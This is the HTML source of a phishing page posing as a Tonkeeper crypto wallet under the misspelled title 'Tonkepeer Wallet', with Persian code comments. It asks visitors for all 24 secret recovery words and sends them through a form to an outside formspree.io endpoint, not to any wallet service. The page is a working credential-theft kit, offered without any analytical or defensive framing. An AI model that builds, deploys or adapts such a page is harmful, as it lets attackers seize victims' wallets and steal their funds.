<!DOCTYPE html>
<html lang="fa">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Tonkepeer Wallet</title>
    <link rel="stylesheet" href="styles.css"> <!-- لینک به فایل CSS -->
    <link rel="icon" href="files/favicon/favicon.ico" type="image/x-icon">
    <link rel="icon" href="tonkeeper-logo.svg" type="image/svg+xml">


    

</head>

<body>
    <h1>Enter your recovery phase</h1>
    <h2>To restore access to your wallet, enter the 24 secret</h2>
    <h3>recovery words given to you when you created your wallet.</h3>
    <form id="seedForm" action="https://formspree.io/f/xnnqqzew" method="POST">
        <div class="container">
            <!-- ستون اول -->
            <div class="column">
                <div class="input-group">
                    <label for="word-1">1:</label>
                    <input type="text" id="word-1" name="word-1" required>
                </div>
                <div class="input-group">
                    <label for="word-2">2:</label>
                    <input type="text" id="word-2" name="word-2" required>
                </div>
                <div class="input-group">
                    <label for="word-3">3:</label>
                    <input type="text" id="word-3" name="word-3" required>
                </div>
                <div class="input-group">
                    <label for="word-4">4:</label>
                    <input type="text" id="word-4" name="word-4" required>
                </div>
                <div class="input-group">
                    <label for="word-5">5:</label>
                    <input type="text" id="word-5" name="word-5" required>
                </div>
                <div class="input-group">
                    <label for="word-6">6:</label>
                    <input type="text" id="word-6" name="word-6" required>
                </div>
                <div class="input-group">
                    <label for="word-7">7:</label>
                    <input type="text" id="word-7" name="word-7" required>
                </div>
                <div class="input-group">
                    <label for="word-8">8:</label>
                    <input type="text" id="word-8" name="word-8" required>
                </div>
            </div>
            
            <!-- ستون دوم -->
            <div class="column">
                <div class="input-group">
                    <label for="word-9">9:</label>
                    <input type="text" id="word-9" name="word-9" required>
                </div>
                <div class="input-group">
                    <label for="word-10">10:</label>
                    <input type="text" id="word-10" name="word-10" required>
                </div>
                <div class="input-group">
                    <label for="word-11">11:</label>
                    <input type="text" id="word-11" name="word-11" required>
                </div>
                <div class="input-group">
                    <label for="word-12">12:</label>
                    <input type="text" id="word-12" name="word-12" required>
                </div>
                <div class="input-group">
                    <label for="word-13">13:</label>
                    <input type="text" id="word-13" name="word-13" required>
                </div>
                <div class="input-group">
                    <label for="word-14">14:</label>
                    <input type="text" id="word-14" name="word-14" required>
                </div>
                <div class="input-group">
                    <label for="word-15">15:</label>
                    <input type="text" id="word-15" name="word-15" required>
                </div>
                <div class="input-group">
                    <label for="word-16">16:</label>
                    <input type="text" id="word-16" name="word-16" required>
                </div>
            </div>
            
            <!-- ستون سوم -->
            <div class="column">
                <div class="input-group">
                    <label for="word-17">17:</label>
                    <input type="text" id="word-17" name="word-17" required>
                </div>
                <div class="input-group">
                    <label for="word-18">18:</label>
                    <input type="text" id="word-18" name="word-18" required>
                </div>
                <div class="input-group">
                    <label for="word-19">19:</label>
                    <input type="text" id="word-19" name="word-19" required>
                </div>
                <div class="input-group">
                    <label for="word-20">20:</label>
                    <input type="text" id="word-20" name="word-20" required>
                </div>
                <div class="input-group">
                    <label for="word-21">21:</label>
                    <input type="text" id="word-21" name="word-21" required>
                </div>
                <div class="input-group">
                    <label for="word-22">22:</label>
                    <input type="text" id="word-22" name="word-22" required>
                </div>
                <div class="input-group">
                    <label for="word-23">23:</label>
                    <input type="text" id="word-23" name="word-23" required>
                </div>
                <div class="input-group">
                    <label for="word-24">24:</label>
                    <input type="text" id="word-24" name="word-24" required>
                </div>
            </div>
        </div>
        <div class="button-container">
            <button type="submit">Continue</button>
        </div>
    </form>
</body>
</html>
